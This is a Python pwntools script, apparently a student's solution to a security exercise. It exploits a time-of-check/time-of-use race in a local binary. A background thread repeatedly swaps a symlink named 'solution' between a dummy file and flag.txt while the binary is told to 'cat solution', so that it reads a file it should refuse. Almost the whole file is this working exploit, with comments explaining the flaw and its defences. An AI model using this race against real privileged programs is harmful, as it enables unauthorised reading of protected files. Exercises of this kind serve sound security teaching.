- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-
- from pwn import *
- import os
- import threading
- import time
# Load the target ELF; the EXE argument overrides the default path.
exe = ELF(args.EXE or './main.elf')
# Binding the ELF to the pwntools context makes it the context's binary.
context.binary = exe
# Terminal command pwntools uses when it has to open a new window (tmux split).
context.terminal = ['tmux', 'split-window', '-h']
def start(argv=[], *a, **kw):
    """Launch the target binary, under GDB when the GDB argument is set.

    Args:
        argv: Extra command-line arguments appended after the binary path.
            The default list is shared between calls but is never mutated
            here; a new list is built on every call.
        *a: Positional arguments forwarded to the launcher.
        **kw: Keyword arguments forwarded to the launcher.

    Returns:
        Whatever ``gdb.debug`` or ``process`` returns for the started target.
    """
    command = [exe.path] + argv
    if not args.GDB:
        return process(command, *a, **kw)
    # Debug run: attach the module-level gdbscript to the session.
    return gdb.debug(command, *a, gdbscript=gdbscript, **kw)
# GDB commands passed to gdb.debug() by start(); only used on a GDB run.
gdbscript = """
tbreak main
continue
"""

# Start the target once; every later interaction goes through this handle.
io = start()
- # Student Code Area
- ########################################################################
- # begin student code
def create_symlink(target, link_name):
    """Point ``link_name`` at ``target``, removing an existing entry first.

    Any failure is printed and swallowed; the function always returns None.

    Note: ``os.path.exists`` follows symlinks, so a dangling link at
    ``link_name`` is not removed first; ``os.symlink`` then fails and the
    error is only printed. Removing and re-creating are two separate calls,
    so the path is briefly absent between them.

    Args:
        target: Path the new symbolic link should refer to.
        link_name: Path at which the symbolic link is created.
    """
    try:
        already_there = os.path.exists(link_name)
        if already_there:
            os.unlink(link_name)
        os.symlink(target, link_name)
    except Exception as err:
        # Best effort: report the problem and let the caller carry on.
        print(f"Error creating symlink: {err}")
def race_condition(stop_event):
    """Flip the ``solution`` link between two targets until asked to stop.

    Each pass points ``solution`` at ``dummy``, waits about a millisecond,
    then points it at ``flag.txt``. The stop flag is only checked at the top
    of a pass, so a pass that has started always finishes.

    Review context: this is the time-of-check/time-of-use pattern. It only
    has an effect on a program that validates a path and later reopens it by
    name (presumably what the exercise binary does; not visible here). Code
    that opens the file once and checks the resulting descriptor, or refuses
    symlinks with O_NOFOLLOW, is not affected.

    Args:
        stop_event: ``threading.Event``; setting it ends the loop.
    """
    link_path = "solution"
    pause_seconds = 0.001  # gap between the two link states
    while True:
        if stop_event.is_set():
            return
        create_symlink("dummy", link_path)
        time.sleep(pause_seconds)
        create_symlink("flag.txt", link_path)
# Placeholder file that the link refers to during the first half of each pass.
with open("dummy", "w") as f:
    f.write("This is a dummy file.")

# Background worker that keeps re-pointing the link; the event is its off switch.
# daemon=True so a hung worker cannot keep the interpreter alive at exit.
stop_event = threading.Event()
race_thread = threading.Thread(
    target=race_condition,
    args=(stop_event,),
    daemon=True,
)
race_thread.start()

# Send the command exactly as an interactive user would type it (bytes, newline added).
io.sendline(b"cat solution")

# Read until the target closes its output or ten seconds pass, then show it.
output = io.recvall(timeout=10).decode()
print(f"Program output:\n{output}")

# Ask the worker to finish its current pass and wait for it to exit.
stop_event.set()
race_thread.join()
# end student code
########################################################################
io.interactive()